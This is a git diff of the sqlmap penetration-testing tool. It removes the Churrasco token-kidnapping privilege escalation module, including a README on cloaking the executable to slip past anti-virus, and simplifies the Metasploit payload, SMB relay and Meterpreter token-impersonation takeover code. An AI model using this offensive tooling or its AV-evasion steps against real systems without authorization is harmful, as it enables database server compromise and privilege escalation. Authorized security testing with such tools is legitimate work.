diff --git a/doc/README.sgml b/doc/README.sgml index 92d02520b..e23358d6d 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -225,12 +225,13 @@ blind SQL injection. It is possible to provide a single target URL, get the list of targets from requests log file or - -conversations/ folder, get the whole HTTP request from a text -file or get the list of targets by providing sqlmap with a Google dork -which queries search engine and -parses its results page. You can also define a regular-expression based -scope that is used to identify which of the parsed addresses to test. + conversations/ folder, get the whole HTTP +request from a text file or get the list of targets by providing sqlmap +with a Google dork which queries search engine and parses its results page. You can also +define a regular-expression based scope that is used to identify which of +the parsed addresses to test. Automatically tests all provided GET parameters, POST parameters, HTTP Cookie header values and HTTP @@ -639,7 +640,7 @@ Options: --os-pwn Prompt for an out-of-band shell, meterpreter or VNC --os-smbrelay One click prompt for an OOB shell, meterpreter or VNC --os-bof Stored procedure buffer overflow exploitation - --priv-esc User priv escalation by abusing Windows access tokens + --priv-esc Database process' user privilege escalation --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed --tmp-path=TMPPATH Remote absolute path of temporary files directory @@ -5051,11 +5052,9 @@ send the NTLM session hash when connecting to a SMB service [hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131 [hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907 [hh:mm:16] [INFO] which payload do you want to use? -[1] Reflective Meterpreter (default) -[2] PatchUp Meterpreter (only from Metasploit development revision 6742) -[3] Shell -[4] Reflective VNC -[5] PatchUp VNC (only from Metasploit development revision 6742) +[1] Meterpreter (default) +[2] Shell +[3] VNC > 1 [hh:mm:16] [INFO] which SMB port do you want to use? [1] 139/TCP (default) diff --git a/lib/contrib/tokenkidnapping/Churrasco.exe_ b/lib/contrib/tokenkidnapping/Churrasco.exe_ deleted file mode 100644 index 660f7d462..000000000 Binary files a/lib/contrib/tokenkidnapping/Churrasco.exe_ and /dev/null differ diff --git a/lib/contrib/tokenkidnapping/README.txt b/lib/contrib/tokenkidnapping/README.txt deleted file mode 100644 index d956def31..000000000 --- a/lib/contrib/tokenkidnapping/README.txt +++ /dev/null @@ -1,11 +0,0 @@ -Due to the anti-virus positive detection of executable stored inside this -folder, we needed to somehow circumvent this. As from the plain sqlmap -users perspective nothing has to be done prior to its usage by sqlmap, but -if you want to have access to the original executable use the decrypt -functionality of the ../extra/cloak/cloak.py utility. - -To prepare the executable to the cloaked form use this command: -python ../extra/cloak/cloak.py -i Churrasco.exe - -To get back the original executable use this: -python ../extra/cloak/cloak.py -d -i Churrasco.exe_ diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b96f17b92..7ec114d27 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -352,8 +352,7 @@ def cmdLineParser(): "exploitation") takeover.add_option("--priv-esc", dest="privEsc", action="store_true", - help="User priv escalation by abusing Windows " - "access tokens") + help="Database process' user privilege escalation") takeover.add_option("--msf-path", dest="msfPath", help="Local path where Metasploit Framework 3 " diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 0c960957c..38a0bcac2 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -185,7 +185,7 @@ class Metasploit: elif kb.os == "Windows" and encode: return self.__skeletonSelection("payload encoding", self.__msfEncodersList) - def __selectPayload(self, askChurrasco=True): + def __selectPayload(self): if kb.os == "Windows" and conf.privEsc: infoMsg = "forcing Metasploit payload to Meterpreter because " infoMsg += "it is the only payload that can be used to " @@ -249,19 +249,7 @@ class Metasploit: break - elif not askChurrasco: - logger.warn("beware that the VNC injection might not work") - - break - elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ): - uploaded = self.uploadChurrasco() - - if not uploaded: - warnMsg = "beware that the VNC injection " - warnMsg += "might not work" - logger.warn(warnMsg) - break elif not choice.isdigit(): @@ -312,12 +300,12 @@ class Metasploit: def __selectConnection(self): return self.__skeletonSelection("connection type", self.__msfConnectionsList) - def __prepareIngredients(self, encode=True, askChurrasco=True): + def __prepareIngredients(self, encode=True): self.connectionStr = self.__selectConnection() self.lhostStr = self.__selectLhost() self.rhostStr = self.__selectRhost() self.portStr = self.__selectPort() - self.payloadStr = self.__selectPayload(askChurrasco) + self.payloadStr = self.__selectPayload() self.encoderStr = self.__selectEncoder(encode) if self.payloadStr == "linux/x86/shell": @@ -350,7 +338,7 @@ class Metasploit: def __forgeMsfConsoleResource(self): self.resourceFile = os.path.join(conf.outputPath, self.__randFile) - self.__prepareIngredients(encode=False, askChurrasco=False) + self.__prepareIngredients(encode=False) self.__resource = "use windows/smb/smb_relay\n" self.__resource += "set SRVHOST %s\n" % self.lhostStr @@ -426,9 +414,6 @@ class Metasploit: cmd = "%s &" % self.exeFilePathRemote - if self.cmdFromChurrasco and kb.stackedTest: - cmd = "%s \"%s\"" % (self.churrascoPath, cmd) - if kb.dbms == "Microsoft SQL Server" and kb.stackedTest: cmd = self.xpCmdshellForgeCmd(cmd) @@ -462,7 +447,7 @@ class Metasploit: infoMsg = "displaying the list of Access Tokens availables. " infoMsg += "Choose which user you want to impersonate by " infoMsg += "using incognito's command 'impersonate_token' if " - infoMsg += "'getsystem' did not success to elevate privileges" + infoMsg += "'getsystem' does not success to elevate privileges" logger.info(infoMsg) proc.stdin.write("list_tokens -u\n") @@ -534,7 +519,7 @@ class Metasploit: self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr) self.__initVars() - self.__prepareIngredients(encode=encode, askChurrasco=False) + self.__prepareIngredients(encode=encode) self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra) logger.debug("executing local command: %s" % self.__payloadCmd) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index ebe2ad12b..ad871290a 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -54,32 +54,9 @@ class Takeover(Abstraction, Metasploit, Registry): def __init__(self): self.cmdTblName = "sqlmapoutput" self.tblField = "data" - self.cmdFromChurrasco = False Abstraction.__init__(self) - def uploadChurrasco(self): - msg = "do you want sqlmap to upload Churrasco and call the " - msg += "Metasploit payload stager as its argument so that it " - msg += "will be started as SYSTEM? [y/N] " - - output = readInput(msg, default="N") - - if output and output[0] in ( "y", "Y" ): - tmpFile = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe_")) - - wFile = tmpFile.name - self.churrascoPath = "%s/tmpc%s.exe" % (conf.tmpPath, randomStr(lowercase=True)) - self.cmdFromChurrasco = True - - self.writeFile(wFile, self.churrascoPath, "binary", confirm=False) - - tmpFile.close() - - return True - else: - return False - def osCmd(self): stackedTest() @@ -172,27 +149,6 @@ class Takeover(Abstraction, Metasploit, Registry): debugMsg += "user, no need to privilege escalate" logger.debug(debugMsg) - elif kb.dbms == "PostgreSQL": - debugMsg = "by default PostgreSQL on Windows runs as postgres " - debugMsg += "user which has no access to LSASS: it is " - debugMsg += "unlikely that the privilege escalation " - debugMsg += "via 'incognito' extension will be successful" - logger.debug(debugMsg) - - elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ): - debugMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0] - debugMsg += "runs as Network Service which has Windows " - debugMsg += "Impersonation Tokens" - logger.debug(debugMsg) - - uploaded = self.uploadChurrasco() - - if not uploaded: - debugMsg = "beware that the privilege escalation " - debugMsg += "might not work via Churrasco if " - debugMsg += "MS09-012 patch is installed" - logger.debug(debugMsg) - elif kb.os != "Windows" and conf.privEsc: # Unset --priv-esc if the back-end DBMS underlying operating # system is not Windows diff --git a/sqlmap.conf b/sqlmap.conf index a2b766f1c..9e1466447 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -375,10 +375,9 @@ osSmb = False # Valid: True or False osBof = False -# Local User privilege escalation by abusing Windows access tokens using -# Meterpreter incognito extension. -# Note: Use in conjunction with osPwn or osSmb. It will force the payload -# to be Meterpreter. +# Database process' user privilege escalation. +# Note: Use in conjunction with osPwn, osSmb or osBof. It will force the +# payload to be Meterpreter. privEsc = False # Local path where Metasploit Framework 3 is installed.